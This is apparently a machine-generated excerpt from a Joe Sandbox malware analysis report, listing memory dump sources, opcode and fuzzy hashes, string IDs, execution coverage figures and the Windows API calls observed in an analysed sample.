                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Hbq$Hbq$Hbq$Hbq
                                                                                                                                                                                                                                                  • API String ID: 0-2881081751
                                                                                                                                                                                                                                                  • Opcode ID: c0833ca86d995ee88095aa59a460137bd7d9d6a6fde97fa4dc98d358bb56f206
                                                                                                                                                                                                                                                  • Instruction ID: d113cd13451a269c6a7b7c4904de79a3bb858c3b30684dd23547f0365d3900b0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0833ca86d995ee88095aa59a460137bd7d9d6a6fde97fa4dc98d358bb56f206
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B891A134F102118FCB699F79C4542BEBBE2BF89300F148579D546EB286DB38D942CB94
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (_^q$(_^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-2667574237
                                                                                                                                                                                                                                                  • Opcode ID: 82fb0ab554f65a39b1af9744b2ff7467f76bf083f28c883b1ec1276828ba5368
                                                                                                                                                                                                                                                  • Instruction ID: bf004e7f9c66adcc1d0ba6747b509d74d54ef5c27489e97f10f148f9a7c401bc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82fb0ab554f65a39b1af9744b2ff7467f76bf083f28c883b1ec1276828ba5368
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB225774A402089FDB15EFB8D950B9DBBB2FF88304F1089A9D005AF269DB31AD45DF91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (_^q$(_^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-2667574237
                                                                                                                                                                                                                                                  • Opcode ID: b2886ad1899fb98ad478a4b1a4e9a8bae0d3cebd9486be255039057c0acd3ea5
                                                                                                                                                                                                                                                  • Instruction ID: d93660600e453bacec9f517895794715d4c0b9dcd29f992ad86f174dc868c16c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2886ad1899fb98ad478a4b1a4e9a8bae0d3cebd9486be255039057c0acd3ea5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55224774A402089FDB15EFA8D950B9DBBB2FF88304F1089A9D005AF269DB31AD45DF91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (_^q$(_^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-142850551
                                                                                                                                                                                                                                                  • Opcode ID: ead889261d05fdfcfce943f1ae1773186455d70dbdfd4721bc6266e9a6367abb
                                                                                                                                                                                                                                                  • Instruction ID: 41b7c7f6381d96ed32b8104753ab71e74bb7eb52a9092ce896ade0fff3e69d5d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ead889261d05fdfcfce943f1ae1773186455d70dbdfd4721bc6266e9a6367abb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FC16974A402089FDB09EFE8DA40A9DBBB6FF88304F108969D111AF368DB31AD45DF51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (_^q$(_^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-142850551
                                                                                                                                                                                                                                                  • Opcode ID: 6f0be18b3eee6e7473f2b95e95fafe3d3e92a7b80faa269ce7fd56ffc5a804ee
                                                                                                                                                                                                                                                  • Instruction ID: 34f2fdae78272b37fe7897863f18719c0a6cea6ae5f1c238f588358f67d2ef21
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f0be18b3eee6e7473f2b95e95fafe3d3e92a7b80faa269ce7fd56ffc5a804ee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CC15874A402089FDB09EFE8DA40A9DBBB6FF88304F108929D111AF368DB31AD45DF51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:13.8%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:3.1%
                                                                                                                                                                                                                                                  Total number of Nodes:131
                                                                                                                                                                                                                                                  Total number of Limit Nodes:12

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: C*${*$^Wl^
                                                                                                                                                                                                                                                  • API String ID: 0-3592993007
                                                                                                                                                                                                                                                  • Opcode ID: 6e63f2c700dcb8f5b0193d863e31a7a99429dd49706037a71370b04048731ee7
                                                                                                                                                                                                                                                  • Instruction ID: c3b9bf28719bcbc8b344abf16a16270bb46258d29fe737bdfb068b997e01ff96
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e63f2c700dcb8f5b0193d863e31a7a99429dd49706037a71370b04048731ee7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94C29F74E012298FDBA4EF28D898B9DB7B1FB49304F1081E9D809A7354DB35AE85CF54
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .$1
                                                                                                                                                                                                                                                  • API String ID: 0-1839485796
                                                                                                                                                                                                                                                  • Opcode ID: 960c0b638a2fd7403ccdba69fcd8e1a1933f1754913193ad77192b2f7939097b
                                                                                                                                                                                                                                                  • Instruction ID: 55296d0ae391355fc1ed04658b84c309c2cc2a7fb1e896a20696d839ac443723
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 960c0b638a2fd7403ccdba69fcd8e1a1933f1754913193ad77192b2f7939097b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8F1FE74E01228CFDB68DF64C884BADBBB2BF89305F1095E9D50AAB254DB315E85CF50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  • Opcode ID: cce2fd8ddf9deea90ad0b40b9944082bbb6f8b52bcf98b68a6de424d14020346
                                                                                                                                                                                                                                                  • Instruction ID: f628125b1ade487e35177d04921778d0bf5a47826681910642de98a6fd6e9604
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cce2fd8ddf9deea90ad0b40b9944082bbb6f8b52bcf98b68a6de424d14020346
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C219F74E012189FCB48EFA9E884ADDBBB6FB8D314F10956AE415B7360DB305845CF54
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: S2
                                                                                                                                                                                                                                                  • API String ID: 0-3178285963
                                                                                                                                                                                                                                                  • Opcode ID: 42bc1a2a965fb5be3cfa5516d4f421fe7e534391cf915b8c6b69cc66c35d56a6
                                                                                                                                                                                                                                                  • Instruction ID: 59bb46e47a3e0053b9404f9f996f2b1eea6bc73ad4da13fefe1f32014e2552a8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42bc1a2a965fb5be3cfa5516d4f421fe7e534391cf915b8c6b69cc66c35d56a6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08910374E01219CFDBA4EFA8D984B9DBBB2FF49304F1091A9D549A7350DB306A85CF41
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $^q
                                                                                                                                                                                                                                                  • API String ID: 0-388095546
                                                                                                                                                                                                                                                  • Opcode ID: 1fca192d4c3648b4ca3833e900ea0ca55f91923d9c25d7f50360537b706d1259
                                                                                                                                                                                                                                                  • Instruction ID: f85a571b4e7bf3b3089a5618eac8314315bf636530d1b4796b89288e903d1891
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fca192d4c3648b4ca3833e900ea0ca55f91923d9c25d7f50360537b706d1259
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64711234E01218CFDB58EFA9D884AADBBB2FF89304F209569D415BB354DB359842CF51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 28fe92ff379e677843918305482b5337896bf4ea1f736901b77ddd058281de75
                                                                                                                                                                                                                                                  • Instruction ID: 8fb1181580f7decea213632a7183c077ee1b5cd7f48ece12228c293e2b5d4021
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28fe92ff379e677843918305482b5337896bf4ea1f736901b77ddd058281de75
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1228E74D00229CFDBA5DF69C894BDABBB1BF89304F1085EAD549A7250EB315E85CF80
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-2449488485
                                                                                                                                                                                                                                                  • Opcode ID: 61507ec7b4945aab9d6c1bebf81a5bc96eb2051174b9a4829e4a81bc7ea27890
                                                                                                                                                                                                                                                  • Instruction ID: 9fac94ba72b90e23c669df26a46a3ea038201d46b9277b76788130eeeb1f7a72
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61507ec7b4945aab9d6c1bebf81a5bc96eb2051174b9a4829e4a81bc7ea27890
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8822AF30B107059FDB549B69C854A6EBBF6FF89204F24885AE906CB3A2CF74DC45CB91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-2392861976
                                                                                                                                                                                                                                                  • Opcode ID: c59889d01ad5ec15d7737db7ffc8401e1fd313f37eecb92ea15a80523b23f4fe
                                                                                                                                                                                                                                                  • Instruction ID: 40f342ffa7b4dc52c67dcae65486a51d2932a2095ee512dd06366e58ff9b2c2d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c59889d01ad5ec15d7737db7ffc8401e1fd313f37eecb92ea15a80523b23f4fe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EC19D34B407049FDB649B68C854A2E77E6FF89704F208869E6038B7A6CF75DC46CB91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 030EB086
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1806684936.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_30e0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                                  • Opcode ID: ae919f0829e543232a7c8bdd9777853071c5974830e47f626b07efe770f0eb48
                                                                                                                                                                                                                                                  • Instruction ID: c2c4c1d72e011542c48e37b470a5fc93122935996450e6a7695bc443374e9c93
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae919f0829e543232a7c8bdd9777853071c5974830e47f626b07efe770f0eb48
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA8145B0B01B058FDB64DF69D14479ABBF5FF88304F04896ED09A9BA50D735E84ACB90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: RlPj
                                                                                                                                                                                                                                                  • API String ID: 0-374472547
                                                                                                                                                                                                                                                  • Opcode ID: 20cc360ff6aeb0ba6b0ec171a1b63b16ee1d4be6918996300dbdb3f81fa9bd82
                                                                                                                                                                                                                                                  • Instruction ID: aba261afe767745d77aed05ffc0591be75ff701e1aea7d764d92fb10c3a72dab
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20cc360ff6aeb0ba6b0ec171a1b63b16ee1d4be6918996300dbdb3f81fa9bd82
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DE1AE30B503149FEB509F68C854B6E7BE2FF89708F108459E6029B3A1CFB5DD458B91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 06547718
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 6842923-0
                                                                                                                                                                                                                                                  • Opcode ID: b6ea5e5c0d1e578148da6a191eefdf5fc2738218638452101cea790d5ec42afa
                                                                                                                                                                                                                                                  • Instruction ID: 77c8b13f3ab00d9adc9448bfee67242afe1a8e291658cdf782c9db8dba686e86
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ea5e5c0d1e578148da6a191eefdf5fc2738218638452101cea790d5ec42afa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8051D574E01208DFDB48DFA9E594A9DBBF2FF88300F10906AD416AB354DB345946CF90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 06547718
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 6842923-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 030E59F1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1806684936.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_30e0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 030E59F1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1806684936.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_30e0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030ED2C6,?,?,?,?,?), ref: 030ED387
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1806684936.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_30e0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030ED2C6,?,?,?,?,?), ref: 030ED387
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1806684936.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_30e0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030EB101,00000800,00000000,00000000), ref: 030EB312
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1806684936.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_30e0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030EB101,00000800,00000000,00000000), ref: 030EB312
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1806684936.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_30e0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0654754D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 030EB086
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1806684936.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_30e0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0654754D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
